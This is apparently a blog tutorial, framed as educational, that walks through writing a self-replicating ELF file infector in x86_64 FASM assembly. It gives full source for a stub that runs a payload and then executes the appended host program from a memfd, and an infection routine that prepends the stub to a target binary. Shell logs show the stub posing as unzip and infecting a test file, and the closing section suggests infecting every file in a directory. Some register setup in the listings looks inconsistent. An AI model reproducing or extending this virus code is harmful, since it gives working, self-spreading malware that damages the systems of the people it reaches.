A technique for ELF file infection.
Introduction
There are many approaches to ELF file infection. Some of them are better, some of them are worse. In the end, the worst way to mess up is simply breaking the program that is being infected so that it no longer functions properly. The techniques that are relatively easy to find on the internet have numerous flaws that sometimes make it difficult to infect a program without destroying it. If one appends a new section or an ELF program header, there is always a nonzero chance that the ELF file is structured in a peculiar way or depends on the offsets in the file in such a manner that it ceases to work correctly (as an entry must be inserted into the ELF program header/section table, the entire ELF file must be moved to make room for it). Other infectors choose to wrap the original program and call it during the runtime, but I am not particularly fond of their implementations either - they often rely on temporary files, which obstruct argv[0] (and more), disrupt passing argv, argp and extensively utilise libc drastically increasing the file size, etc…
It is evident that the most logical choice for me is to finally provide an educational resource on an ELF infector that is (largely) foolproof.
The game plan
I would like to create a program (ideally using x86_64 assembly language compiled using FASM for a small size out of the box) to which an ELF file can be appended and then executed by the program when ran. In general, if the path to an ELF file is known, it can be easily executed while maintaining the values of argc, argv, and argp:
format ELF64 executable
use64
sys_execve equ 59
entry _start
stuff: db "/usr/bin/sh", 0
_start:
; Load the path to the executable
mov rdi, stuff
; Prepare to call execve
; Load argc + argv
lea rsi, [rsp + 8]
; Load argp
mov rdx, [rsp]
lea rdx, [rsp+8 + rdx*8 + 8]
; Perform the syscall
mov rax, sys_execve
syscall
Clearly, I could take an additional step and sketch a traditional “bad” ELF infector that extracts an ELF file attached to it and executes it. However, I will skip this step as it is a waste of time. Instead, I will utilize memfd_create to create a memory-backed file descriptor, insert the ELF file contents into it using sendfile, and pass "/proc/self/fd/..." as an argument to execve.
An implementation
Let’s start with our previous “skeleton” and expand upon it.
format ELF64 executable
use64
; XXX: You have to set this to the resulting ELF file size manually.
SIZE equ ??
sys_execve equ 59
sys_open equ 2
sys_lseek equ 8
sys_memfd_create equ 319
sys_sendfile equ 40
sys_close equ 3
entry _start
memfd_path: db "/proc/self/fd/", 0, 0
self: db '/proc/self/exe', 0
empty: db 0
size: dq SIZE
load_elf:
sub rsp, 8
; Open ourselves.
xor esi, esi
mov edi, self
mov rax, sys_open
syscall
; Obtain the length: seek to back.
mov r8, rax
mov rdi, r8
mov rax, sys_lseek
syscall
; Ok, now rewind the file to the beginning.
mov r10, rax
mov rdx, rsi
mov rax, r9
syscall
; Call memfd_create, call with MFD_CLOEXEC.
mov edi, empty
mov esi, 1
mov rax, sys_memfd_create
syscall
; Copy the file contents to the memfd using sendfile.
mov edx, size
mov r9, rax
mov rdi, rax
mov rsi, r8
sub r10d, SIZE
mov rax, sys_sendfile
syscall
; Close the file descriptor we hold to our own binary.
mov eax, sys_close
mov rdi, r8
syscall
; Bravely assume that the memfd descriptor number is a single digit.
; This might or might not work reliably, but improving upon it is
; trivially beyond the scope of this post.
add r9d, 48
mov BYTE [memfd_path + 14], r9b
mov BYTE [memfd_path + 15], 0
add rsp, 8
ret
_start:
; Load the executable to a memfd.
call load_elf
; Load the path to the executable
mov rdi, memfd_path
; Prepare to call execve
; Load argc + argv
lea rsi, [rsp + 8]
; Load argp
mov rdx, [rsp]
lea rdx, [rsp+8 + rdx*8 + 8]
; Perform the syscall
mov rax, sys_execve
syscall
I have confirmed that my code works as intended:
0 ~/workspace % fasm stub.asm
flat assembler version 1.73.30 (16384 kilobytes memory)
2 passes, 323 bytes.
0 ~/workspace % cat /usr/bin/sh >> stub
0 ~/workspace % export A=5
0 ~/workspace % ./stub
$ echo $A
5
$ exit 4
4 ~/workspace % ./stub -invalid
./stub: 0: Illegal option -d
2 ~/workspace %
x86_64 assembly code golf.
It is somewhat disturbing that a program this simple requires more than 320 bytes of machine code, so I will put forth some effort to make it smaller. I will utilize a few cheap tricks I have learned over the years, but I believe that explaining them falls outside the scope of this particular post (please stay tuned!). Ultimately, the size of the file was reduced to approximately 267 bytes. I have also added a payload stub call that will be useful in the future.
format ELF64 executable
use64
; XXX: You have to set this to the resulting ELF file size manually.
SIZE equ ??
sys_execve equ 59
sys_open equ 2
sys_lseek equ 8
sys_memfd_create equ 319
sys_sendfile equ 40
sys_write equ 1
sys_close equ 3
entry _start
memfd_path: db '/proc/self/fd/',0,0
self: db '/proc/self/exe'
empty: db 0
size: dq SIZE
load_elf:
; Open ourselves.
xor esi, esi
mov edi, self
push sys_open
pop rax
syscall
; Obtain the length: seek to back.
mov r8, rax
mov rdi, r8
push sys_lseek
pop rax
syscall
; Call memfd_create, call with MFD_CLOEXEC.
mov edi, empty
push 1
pop rsi
push sys_memfd_create
pop rax
syscall
; Copy the file contents to the memfd using sendfile.
mov edx, size
mov r9, rax
mov rdi, rax
mov rsi, r8
sub r10d, SIZE
push sys_sendfile
pop rax
syscall
; Close the file descriptor we hold to our own binary.
push sys_close
pop rax
mov rdi, r8
syscall
; Bravely assume that the memfd descriptor number is a single digit.
; This might or might not work all of the times, but improving upon
; this is trivially beyond the scope of this post.
add r9d, 48
mov BYTE [memfd_path + 14], r9b
ret
payload:
; Generally speaking, the payload code goes here.
ret
_start:
; Run the virus code.
call payload
; Load the executable to a memfd.
call load_elf
; Load the path to the executable
mov rdi, memfd_path
; Prepare to call execve
; Load argc + argv
lea rsi, [rsp + 8]
; Load argp
mov rdx, [rsp]
lea rdx, [rsp+8 + rdx*8 + 8]
; Perform the syscall
push sys_execve
pop rax
syscall
Infecting files.
Simply speaking, you are supposed to put “your own” code inside the payload function of the stub, but for completness, I will illustrate a way of infecting an executable file from within the payload function. It has a few issues: it may reinfect files, the ELF file detection is not that good and it always infects a single, hard-coded file. However, it is a good starting point for further experiments.
; Infect a file. Take the name in `rdi`.
infect:
; Reserve some space on the stack for the buffer.
sub rsp, 944
; Open `rdi`.
push sys_open
pop rbx
mov rsi, rbx
mov rax, rbx
syscall
; Read the ELF header.
mov r9d, eax
lea rsi, [rsp - 128]
; Read 64 bytes.
push 64
pop rdx
mov rdi, r9
; Notice: we're using `rax` as the syscall number here.
; 0 is the syscall number for `read`, hence I did not define it
; to save a few bytes.
xor eax, eax
syscall
; Verify the file header.
movq xmm0, qword [rsi]
movd eax, xmm0
; 0x7F and the magic 0x464C45 ("ELF").
cmp eax, 0x464C457F
jne .no_infect
; Check the amount of sections. Our dropper/stub
; has no sections, so we will assume that the file
; with no sections has been infected already.
; There are better ways, but they require more
; implementation effort.
cmp word [rsp - 68], 0
je .no_infect
; Open the current executable.
; RBX is still sys_open.
mov rdi, self
xor esi, esi
mov rax, rbx
syscall
; Open a memfd.
mov r10d, eax
mov rdi, empty
push sys_memfd_create
pop rax
mov rsi, r8
syscall
; Copy the infection stub to the memfd.
mov ebx, eax
; Buffer. Read the infection stub here and write it to the memfd.
lea r15, [rsp - 64]
; Read SIZE bytes from ourselves.
mov edx, SIZE
mov rdi, r10
mov rsi, r15
xor eax, eax
syscall
; Write them to the memfd: this is the ELF stub.
mov edx, SIZE
mov rdi, rbx
mov rax, r8
syscall
; Seek to the beginning of the the goat file.
; We have read the ELf headers, but we need them back.
push sys_lseek
pop r14
mov rdi, r9
xor esi, esi
xor edx, edx
mov rax, r14
syscall
; Copy the goat file to the memfd in SIZE-big chunks.
.copygoat:
; Read SIZE bytes from the goat file.
mov edx, SIZE
mov rdi, r9
mov rsi, r15
xor eax, eax
syscall
; Check if we have read more than 0 bytes.
mov rdi, rbx
test rax, rax
jle .copygoat_end
; Write the data to the memfd now.
mov rsi, r15
mov rdx, rax
mov rax, r8
syscall
; Loop.
jmp .copygoat
.copygoat_end:
; Seek to the beginning of the memfd and the goat file.
xor esi, esi
xor edx, edx
mov rax, r14
syscall
mov rdi, r9
mov rax, r14
syscall
; Load the buffer again.
lea rsi, [rsp - 64]
.copymemfd:
; Read SIZE bytes from the memfd file.
mov edx, SIZE
mov rdi, rbx
xor eax, eax
syscall
; Check if we have read more than 0 bytes.
test rax, rax
jle .copymemfd_end
; Write the data to the goat file.
mov rdi, r9
mov rdx, rax
mov rax, r8
syscall
jmp .copymemfd
.copymemfd_end:
; Close all the file descriptors.
; RAX gets trashed so we need to save the syscall# elsewhere.
push sys_close
pop rdx
mov rdi, rbx
mov rax, rdx
syscall
mov rdi, r9
mov rax, rdx
syscall
mov rdi, r10
mov rax, rdx
syscall
.no_infect:
add rsp, 944
ret
; Name of the file we want to infect.
inf: db "goat", 0
msg: db 'This file is infected.', 10, 0
payload:
; Print the "This file is infected." message.
mov rsi, msg
push sys_write
pop r8
mov rdx, 23
mov rdi, r8
mov rax, r8
syscall
; Infect the file.
mov rdi, inf
jmp infect
Conclusion
The program I have presented is not particularly stealthy or advanced at present, but I believe that it serves as a good example of a technique for infecting ELF files. Some potential enhancements to consider include:
- Listing the files in the current directory and infecting all of them.
- Modifying an unused ELF header field to indicate that the file has been infected, rather than relying on the fact that the stub has no sections.
- Making further improvements to the code size.
- Compressing the stub once the payload becomes large enough
Finally, the following shell log demonstrates the capabilities of the program:
~/workspace % fasm stub.asm
flat assembler version 1.73.30 (16384 kilobytes memory)
3 passes, 623 bytes.
~/workspace % # Pretend to be unzip:
~/workspace % cat /usr/bin/unzip >> stub
~/workspace % echo "int main(){}" > goat.c
~/workspace % gcc goat.c -o goat
~/workspace % ./goat
~/workspace % ./stub
This file is infected.
UnZip 6.00 of 20 April 2009, by Debian. Original by Info-ZIP.
Usage: unzip [-Z] [-opts[modifiers]] file[.zip] [list] [-x xlist] [-d exdir]
Default action is to extract files in list, except those in xlist, to exdir;
file[.zip] may be a wildcard. -Z => ZipInfo mode ("unzip -Z" for usage).
-p extract files to pipe, no messages -l list files (short format)
-f freshen existing files, create none -t test compressed archive data
-u update files, create if necessary -z display archive comment only
-v list verbosely/show version info -T timestamp archive to latest
-x exclude files that follow (in xlist) -d extract files into exdir
modifiers:
-n never overwrite existing files -q quiet mode (-qq => quieter)
-o overwrite files WITHOUT prompting -a auto-convert any text files
-j junk paths (do not make directories) -aa treat ALL files as text
-U use escapes for all non-ASCII Unicode -UU ignore any Unicode fields
-C match filenames case-insensitively -L make (some) names lowercase
-X restore UID/GID info -V retain VMS version numbers
-K keep setuid/setgid/tacky permissions -M pipe through "more" pager
See "unzip -hh" or unzip.txt for more help. Examples:
unzip data1 -x joe => extract all files except joe from zipfile data1.zip
unzip -p foo | more => send contents of foo.zip via pipe into program more
unzip -fo foo ReadMe => quietly replace existing ReadMe if archive file newer
~/workspace % ./goat
This file is infected.
~/workspace %